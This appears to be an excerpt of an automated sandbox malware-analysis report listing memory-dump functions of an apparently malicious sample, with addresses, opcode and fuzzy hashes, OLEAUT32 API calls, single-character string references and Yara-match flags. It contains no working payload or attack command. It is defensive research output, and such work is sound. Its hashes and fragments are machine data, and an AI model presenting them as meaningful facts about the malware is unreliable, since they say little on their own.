Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction ID: 8488e0a8640df04fcf481087a0a0e2354c4894f8e99b76394d31cfc5082ce78b
Opcode Fuzzy Hash: d3e382a35f6a7edaa88fbd4097d4fd738d9cf468eed6d2bef4b4d717b7d72e8c
Instruction Fuzzy Hash: 6BE01279C11100BFDE046B11FC0161CBA72B76630BF46213AE40873232EF35A436A75D

Function 009932ED Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
Instruction ID: 3e2ca58bde1e48cfe1a33e2ca2d3e2ba6d3dd5d20918657ce15a415797b35b02
Opcode Fuzzy Hash: 03be019c7f84eab5680fd60e5a6e0a4c14760194c7c122451d5e0e1049be607d
Instruction Fuzzy Hash: 4BE0ED75D12100AFDB007B11ED0161C7A72ABA3302B561135E40967231EF325526E799

Function 00996E96 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
Instruction ID: 63e57f364ffa43dce79434478d1ebb5312f9a815e9a700a346f5926bcddccb80
Opcode Fuzzy Hash: 627599c8012a5de30bed4bcc5cdf041527b351da4d44e435234bf5fd0dbcc5af
Instruction Fuzzy Hash: B7D02E2A808823830F290E6E8220239A7270A8330038E06A088C1BFB42CA26CC2302D8

Function 00427AD3 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction ID: 6e3621e5ba52bd1720ea54ad2d17b774c7841a8325dce5c8bd5a6b1d086829a3
Opcode Fuzzy Hash: 9580c00f8d87a75d1cefbcc58e71a064fbff43a3de15b5db8def70aaa11ec223
Instruction Fuzzy Hash: 36D0C279815910CBDB047F01EC0216A73F4AB03389F04007CE88123263DB39D8288E8E

Function 00999F40 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
Instruction ID: fbfd97a82c1e32bbda9ffd7a9d349e0e0e30dade36e0bb4c4692b0a2d31e7407
Opcode Fuzzy Hash: b699e929166f3269f3c0af6cf854a66d2adcb16623502ccf6fa341cc05aeb82f
Instruction Fuzzy Hash: B9D09E72854244ABD9409B00DC42B6AB3B9FBCA704F441565B988B1161E662DA288797

Function 0041C653 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction ID: f6de81edf4edbd36f0565e031b671f89904ab193cb181933f1b50bd017efe36b
Opcode Fuzzy Hash: 49296dab776a215db2218e93475e1eaebcd65e3db626a3e2e0a563717988ad4a
Instruction Fuzzy Hash: C9D0127BF9210047DA099F11DD43775666393C770870DE1398805E3348DE3CD41A840E

Function 0098C8BA Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
Instruction ID: ae4409c34493dcc5fef446637763afc82b5b6b845c31c88fc237ac09d03fdf22
Opcode Fuzzy Hash: a8f9aa8a7fabceb26a773c801b96314e67806ff88a01327c7cabaf7e1195b6db
Instruction Fuzzy Hash: 2AD0127BFC21004B9A099F10DD43B766A6397C770570CE1348905E3348EE3DD41AC00E

Function 0040BFFD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 0097C264 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction ID: c40df4f40b565673574f117b3b393b79a76a3f9a491c552766a49f6821d64b0d
Opcode Fuzzy Hash: 77b0f56a3a3e1bb8ea188a0444bb5e5b9921abf6ae6ebc879750073e405f2179
Instruction Fuzzy Hash: ACC012BCA4C10187D7088F10EC05735B636E797A01F14E125C441232A5C630A403860C

Function 00997D1A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
Instruction ID: 879b1f421af3e2c42721c98d30d1cb1d8858197f95d957302391513fc3dd09c7
Opcode Fuzzy Hash: 341987432dce9904f649f917b7ed575f0bb4bb5c5b4e9ef9425cd867c06a6129
Instruction Fuzzy Hash: F6B092B2C82C108B94113F202C069ABB6241D53342F046430E91A36203BE27D22A849F

Function 00999AB5 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
Instruction ID: 7e2f4e80c649f4ea6c3efca9af8c407151fd1625271ded62c716197449098861
Opcode Fuzzy Hash: f753dbc925eeb97c78fc90efc39af23615c529da2cdf343c0b9dd0ba408761e0
Instruction Fuzzy Hash: D5B012E1C44500C7D800AF205C05832A23C4607211F003820D00CF7103E531D000810D

Function 0042984F Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction ID: 02d06448f02dd76ad61b8ab648816bdf30096f71157e536fee4757e064133957
Opcode Fuzzy Hash: 11edc8d7ae4c917e56862e9043f01123a23c23558e3e2cb29e810181f8f007cd
Instruction Fuzzy Hash: AEA022F8C0A800C3E800CF20BC02030F23C830B2A8F00303AE00CF3203EA30E0088A0E

Function 009A898E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
Instruction ID: 5f90c8482877ae364e78efe8602c82ba5110085f469652caa7ae2d3bb2038f17
Opcode Fuzzy Hash: a4feeaae0c5d4225290c8f64d1143a34bd66befac27b9bcfb2494fe2660e1556
Instruction Fuzzy Hash: AC900224D4D1008681508F449440470E279930B111F103410900CF3062C310D545455D

Function 00431715 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043179A

Strings

^, xrefs: 0043185D
O, xrefs: 0043187B
n, xrefs: 004318D1
, xrefs: 0043183F
Q, xrefs: 00431853
~, xrefs: 004318C1
4, xrefs: 00431821
G, xrefs: 004318A3
{, xrefs: 004318E1
], xrefs: 00431849
;, xrefs: 00431817
0, xrefs: 00431980
#, xrefs: 00431899
m, xrefs: 004318B7
B, xrefs: 00431871
/, xrefs: 00431867
H, xrefs: 004318AD
B, xrefs: 0043188F
J, xrefs: 00431885
0, xrefs: 0043182B

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: e2dddc40eb3f9dab4f65535c588d3d72a3f147e4bda3b82f36fbc837b78308fa
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 8481066010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F58B3E6D6A98146C767

Function 009A197C Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 009A1A01

Strings

^, xrefs: 009A1AC4
], xrefs: 009A1AB0
H, xrefs: 009A1B14
Q, xrefs: 009A1ABA
n, xrefs: 009A1B38
0, xrefs: 009A1A92
0, xrefs: 009A1BE7
m, xrefs: 009A1B1E
/, xrefs: 009A1ACE
~, xrefs: 009A1B28
O, xrefs: 009A1AE2
, xrefs: 009A1AA6
{, xrefs: 009A1B48
#, xrefs: 009A1B00
;, xrefs: 009A1A7E
4, xrefs: 009A1A88
G, xrefs: 009A1B0A
B, xrefs: 009A1AD8
B, xrefs: 009A1AF6
J, xrefs: 009A1AEC

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction ID: 1b8e1dc9e866c2ab236f5a424762dc153f0a7546d1390af2fc32ce20a704249e
Opcode Fuzzy Hash: 88941a0f473d950aaf799373c472504fdf4e728c02f445fde5d667b58de91daa
Instruction Fuzzy Hash: 9B81076010CBC28AD322C63C881875FBFD15BE7224F184B9DE1F54B3E6D6A58146C767

Function 004312D1 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00431360

Strings

0, xrefs: 0043153F
G, xrefs: 00431469
B, xrefs: 00431455
m, xrefs: 0043147D
Q, xrefs: 00431419
n, xrefs: 00431497
/, xrefs: 0043142D
~, xrefs: 00431487
O, xrefs: 00431441
, xrefs: 00431405
0, xrefs: 004313F1
4, xrefs: 004313E7
J, xrefs: 0043144B
], xrefs: 0043140F
;, xrefs: 004313DD
^, xrefs: 00431423
{, xrefs: 004314A7
#, xrefs: 0043145F
H, xrefs: 00431473
B, xrefs: 00431437

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: e21bf8ef08eaefae2f6608d65dd533aaf672cde794620ee92b713000d27e8169
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 9981F52010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C727

Function 009A1538 Relevance: 36.9, APIs: 1, Strings: 20, Instructions: 150memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 009A15C7

Strings

B, xrefs: 009A16BC
, xrefs: 009A166C
{, xrefs: 009A170E
4, xrefs: 009A164E
#, xrefs: 009A16C6
~, xrefs: 009A16EE
0, xrefs: 009A1658
n, xrefs: 009A16FE
G, xrefs: 009A16D0
/, xrefs: 009A1694
0, xrefs: 009A17A6
m, xrefs: 009A16E4
Q, xrefs: 009A1680
O, xrefs: 009A16A8
J, xrefs: 009A16B2
], xrefs: 009A1676
;, xrefs: 009A1644
H, xrefs: 009A16DA
^, xrefs: 009A168A
B, xrefs: 009A169E

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: $#$/$0$0$4$;$B$B$G$H$J$O$Q$]$^$m$n${$~
API String ID: 2525500382-534244583
Opcode ID: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction ID: 4a110a5c8251415badb9a0711b7a616c6b9bebd12c3cd1ea8ee06eb1fba196b9
Opcode Fuzzy Hash: bfb36de6ec62216300921940dd90e50556119a09abea61977352c50feb6b8cd0
Instruction Fuzzy Hash: 0D81F62010CBC289D326C63C885875FBFD16BE7224F184B9DE1F58B3E6D6A98146C767

Function 0042E9ED Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042E9F6
VariantInit.OLEAUT32 ref: 0042EA05

Strings

6, xrefs: 0042EA78
Q, xrefs: 0042EA2C
*, xrefs: 0042EA88
<, xrefs: 0042EA50
0, xrefs: 0042EA60
>, xrefs: 0042EA58
4, xrefs: 0042EA70
., xrefs: 0042EA98
T, xrefs: 0042EA24
8, xrefs: 0042EA40
W, xrefs: 0042EA34
,, xrefs: 0042EA90
-, xrefs: 0042EA94
:, xrefs: 0042EA48
b, xrefs: 0042EA3C
(, xrefs: 0042EA80
2, xrefs: 0042EA68

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 67e1650e07e25dd8c979730081919a9ec74336f1c366e84b3847a4c8d399cf69
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 19410921108BC1CED726CF388488646BFA16F66224F0886DDD8E54F3DBC775D51AC7A6

Function 0099EC54 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 94COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0099EC5D
VariantInit.OLEAUT32 ref: 0099EC6C

Strings

6, xrefs: 0099ECDF
., xrefs: 0099ECFF
-, xrefs: 0099ECFB
<, xrefs: 0099ECB7
,, xrefs: 0099ECF7
0, xrefs: 0099ECC7
>, xrefs: 0099ECBF
W, xrefs: 0099EC9B
2, xrefs: 0099ECCF
*, xrefs: 0099ECEF
(, xrefs: 0099ECE7
8, xrefs: 0099ECA7
4, xrefs: 0099ECD7
T, xrefs: 0099EC8B
:, xrefs: 0099ECAF
b, xrefs: 0099ECA3
Q, xrefs: 0099EC93

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction ID: 75d77b552b839b9c8d300440d592c032834eba99f736d08cb594c59a2d5de279
Opcode Fuzzy Hash: 7ffbdfa689dec1bd21887cc542622a7e9519c13530b26af4dda8f001440ba417
Instruction Fuzzy Hash: 1E410721108BC18ED726CF388488646BFA16B66224F0886DDD8E54F3DAC775D51ACBA6

Function 0042F833 Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F83F
VariantInit.OLEAUT32 ref: 0042F84E

Strings

Q, xrefs: 0042F87B
*, xrefs: 0042F8D7
T, xrefs: 0042F873
-, xrefs: 0042F8E3
b, xrefs: 0042F88B
:, xrefs: 0042F897
., xrefs: 0042F8E7
>, xrefs: 0042F8A7
<, xrefs: 0042F89F
8, xrefs: 0042F88F
6, xrefs: 0042F8C7
,, xrefs: 0042F8DF
(, xrefs: 0042F8CF
W, xrefs: 0042F883
0, xrefs: 0042F8AF
4, xrefs: 0042F8BF
2, xrefs: 0042F8B7

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 5aee6742307bd22be2b72699ebf7517107c7abda4f37a595e92ffc77e439cf83
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 34410820108BC1CED726CF3C9488616BFA16B66224F488ADDD8E54F3DBC375D51ACB66

Function 0099FA9A Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0099FAA6
VariantInit.OLEAUT32 ref: 0099FAB5

Strings

>, xrefs: 0099FB0E
4, xrefs: 0099FB26
(, xrefs: 0099FB36
,, xrefs: 0099FB46
., xrefs: 0099FB4E
6, xrefs: 0099FB2E
0, xrefs: 0099FB16
W, xrefs: 0099FAEA
b, xrefs: 0099FAF2
T, xrefs: 0099FADA
Q, xrefs: 0099FAE2
*, xrefs: 0099FB3E
<, xrefs: 0099FB06
-, xrefs: 0099FB4A
2, xrefs: 0099FB1E
8, xrefs: 0099FAF6
:, xrefs: 0099FAFE

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: ($*$,$-$.$0$2$4$6$8$:$<$>$Q$T$W$b
API String ID: 2610073882-1095711290
Opcode ID: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction ID: 50c4f89e6782e570be81009055cca2a726bb3d0ec97bc24259744b9c372e49a3
Opcode Fuzzy Hash: f781027231551062226cb081f6f7d4146a3b5f5555bc5acf262f956389af0b84
Instruction Fuzzy Hash: 3341D9201087C1CEDB26CF3C9498616BFA16B66224F088ADDD8E58F3DBC375D519CB66

Function 00432409 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043244F

Strings

X, xrefs: 0043246D
C, xrefs: 00432481
@, xrefs: 004324E5
Q, xrefs: 0043249F
@, xrefs: 004324A9
A, xrefs: 004324EA
[, xrefs: 004324C7
L, xrefs: 004324BD
X, xrefs: 00432477
H, xrefs: 004324D1
J, xrefs: 0043248B
E, xrefs: 00432495
[, xrefs: 004324DB
e, xrefs: 004324B3

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction ID: 53b19800ce9beadd92bbeaf8c0dd5e513984ffb5c5a49c85e3815ab243118963
Opcode Fuzzy Hash: 525d7f934687ab0bf19ac530d90f1e1fa4e045b28120346783632a559e286019
Instruction Fuzzy Hash: 0541097010C7C18AD365DB28849878BBFE16B96314F885A9CE6E94B3E2C7798409C757

Function 009A2670 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 90COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 009A26B6

Strings

@, xrefs: 009A274C
[, xrefs: 009A272E
X, xrefs: 009A26D4
X, xrefs: 009A26DE
H, xrefs: 009A2738
e, xrefs: 009A271A
A, xrefs: 009A2751
L, xrefs: 009A2724
@, xrefs: 009A2710
J, xrefs: 009A26F2
[, xrefs: 009A2742
E, xrefs: 009A26FC
Q, xrefs: 009A2706
C, xrefs: 009A26E8

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction ID: e710152513e0b4730852eb22ab5c00e55e189a68b5be61c8845115cae6e14387
Opcode Fuzzy Hash: 38b59cd13938fe8317dc7d58eddabe9e0085401b214a797582b7f2cd6e6565e9
Instruction Fuzzy Hash: 0E41297010C7C18AD365DB28849878FBFE16B97314F885A9CE5E94B3E2C7798445CB53

Function 00432194 Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004321C6

Strings

e, xrefs: 00432231
[, xrefs: 00432245
X, xrefs: 004321F5
X, xrefs: 004321EB
L, xrefs: 0043223B
H, xrefs: 0043224F
@, xrefs: 00432263
Q, xrefs: 0043221D
[, xrefs: 00432259
A, xrefs: 00432268
C, xrefs: 004321FF
@, xrefs: 00432227
E, xrefs: 00432213
J, xrefs: 00432209

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction ID: f917ff13e8fa353cdd9af704c32342f25a9e0069aca0bae3d4b305f03d6e9fde
Opcode Fuzzy Hash: 2ee573a903be5f004d3e2d813880161334ac93031f736f9e15fdb26375ef605a
Instruction Fuzzy Hash: F841187000D7C18AD3619B28849874FBFE06BA7324F885A9DF6E84B3E2C77984498757

Function 009A23FB Relevance: 26.3, APIs: 1, Strings: 14, Instructions: 83COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 009A242D

Strings

X, xrefs: 009A245C
e, xrefs: 009A2498
[, xrefs: 009A24AC
H, xrefs: 009A24B6
Q, xrefs: 009A2484
[, xrefs: 009A24C0
@, xrefs: 009A248E
C, xrefs: 009A2466
A, xrefs: 009A24CF
E, xrefs: 009A247A
@, xrefs: 009A24CA
J, xrefs: 009A2470
X, xrefs: 009A2452
L, xrefs: 009A24A2

Memory Dump Source

Source File: 00000003.00000002.1818190463.0000000000970000.00000040.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_970000_C7B4.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: @$@$A$C$E$H$J$L$Q$X$X$[$[$e
API String ID: 1927566239-3011065302
Opcode ID: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction ID: 7fb081d25cc4855f9a0662a07217f06071335ce69f05c9e48b6a5f817e4dee95
Opcode Fuzzy Hash: 1f6040f1df59cba3b40ed0df49f13582157b33a0c7b331a145014ed0c7e5c107
Instruction Fuzzy Hash: 5A41187000C7C18AD3659B28849874FBFE06BA7314F885A9CF6E84B3E2C7798449C753

Function 00431EDD Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 92COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00431EE7
VariantInit.OLEAUT32 ref: 00431EFA

Strings

p, xrefs: 00431FBF
A, xrefs: 00431F8F
z, xrefs: 00431F6F
z, xrefs: 00431F2F
e, xrefs: 00431F5F
e, xrefs: 00431F1F
n, xrefs: 00431FAF
w, xrefs: 00431F4F
p, xrefs: 00431F9F
v, xrefs: 00431F3F

Memory Dump Source

Source File: 00000003.00000002.1817847426.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1817847426.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_C7B4.jbxd

Similarity

API ID: Variant$ClearInit
String ID: A$e$e$n$p$p$v$w$z$z
API String ID: 2610073882-1114116150
Opcode ID: 285518986e989cac88369cedce0e1c7570f99f932fa8b56f27ac7dcd310c1e64
Instruction ID: 776134ba1da329d7d35a817d8e2b42585fa70f537528e7a9cdeab4ed979499a7
